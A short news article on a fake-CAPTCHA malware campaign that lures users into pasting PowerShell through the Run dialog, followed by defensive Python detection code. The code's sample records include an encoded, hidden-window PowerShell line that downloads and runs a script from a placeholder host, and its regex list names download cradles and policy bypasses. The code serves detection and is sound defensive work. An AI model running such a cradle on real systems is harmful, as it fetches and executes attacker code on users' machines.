Fake CAPTCHA Lures Users Into Running Malware Code
A new malware campaign is leveraging fake browser verification prompts to trick users into executing malicious code, cybersecurity researchers have found. The attack mimics Google’s “I’m not a robot” CAPTCHA system, but instead of clicking images, users are instructed to perform keyboard commands such as pressing Windows + R, Ctrl + V, and Enter. Unbeknownst to them, this sequence triggers a PowerShell script copied to their clipboard through embedded JavaScript.
The malicious payload uses multiple obfuscation techniques, including base64 encoding and string manipulation, to evade detection. Once executed, the script downloads additional malware from remote servers, often employing fileless attack methods that run entirely in memory. The malware uses legitimate Windows processes to maintain persistence, bypassing traditional antivirus defenses.
Security experts recommend disabling automatic clipboard access, tightening PowerShell execution policies, and using advanced endpoint detection tools to monitor suspicious activity. Awareness training is also critical to help users recognize deceptive prompts mimicking legitimate browser security checks.
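Detection logic for the process-creation pattern the article describes (PowerShell started from the Run dialog with a hidden window, a bypassed execution policy, a base64 payload and a download cradle), as an added example that is not part of the original article. It assumes Sysmon-style process-creation records with `ParentImage`, `Image` and `CommandLine` fields; the sample records and the `example.invalid` URL are constructed for the demonstration.

```python
import base64
import re

# Traits of clipboard-delivered PowerShell one-liners: hidden window, bypassed
# policy, base64 payload, download-and-run cradle. Each is weak on its own.
SUSPICIOUS = [
    (r"-(?:nop|noprofile)\b", "no-profile"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"-(?:e|ec|enc|encodedcommand)\s+\S+", "base64-encoded command"),
    (r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", "download-and-run cradle"),
]

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or ''."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # malformed base64 (binascii.Error is a ValueError)
        return ""

def analyse(event):
    """Return the indicators matched by one process-creation record."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    # Scan the raw command line and the decoded payload together.
    text = event["CommandLine"] + " " + decode_encoded_command(event["CommandLine"])
    reasons = [label for pat, label in SUSPICIOUS if re.search(pat, text, re.I)]
    # Win+R starts the process from the shell, so the parent is explorer.exe.
    if reasons and event["ParentImage"].lower().endswith("explorer.exe"):
        reasons.insert(0, "launched from Run dialog (parent explorer.exe)")
    return reasons

def triage(events, threshold=3):
    """Map ProcessId -> indicators for records matching at least `threshold`."""
    return {e["ProcessId"]: r for e in events if len(r := analyse(e)) >= threshold}

# Constructed sample records in the shape of Sysmon Event ID 1 (not real telemetry).
STAGE2 = "iex (iwr http://example.invalid/stage2.ps1)"  # placeholder URL
ENCODED = base64.b64encode(STAGE2.encode("utf-16-le")).decode()
def rec(pid, parent, cmd):
    return {"ProcessId": pid, "ParentImage": parent, "CommandLine": cmd,
            "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"}
EVENTS = [
    rec(1, r"C:\Windows\System32\cmd.exe", "powershell.exe -Command Get-ChildItem C:\\Logs"),
    rec(2, r"C:\Windows\explorer.exe", "powershell.exe -nop -c Get-Date"),
    rec(3, r"C:\Windows\explorer.exe", f"powershell.exe -w hidden -ep bypass -enc {ENCODED}"),
]
```

`triage(EVENTS)` flags only record 3; record 2 (an admin typing a plain command into Win+R) stays below the threshold, which is why the explorer.exe parent is scored as one indicator among several rather than as an alert on its own.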
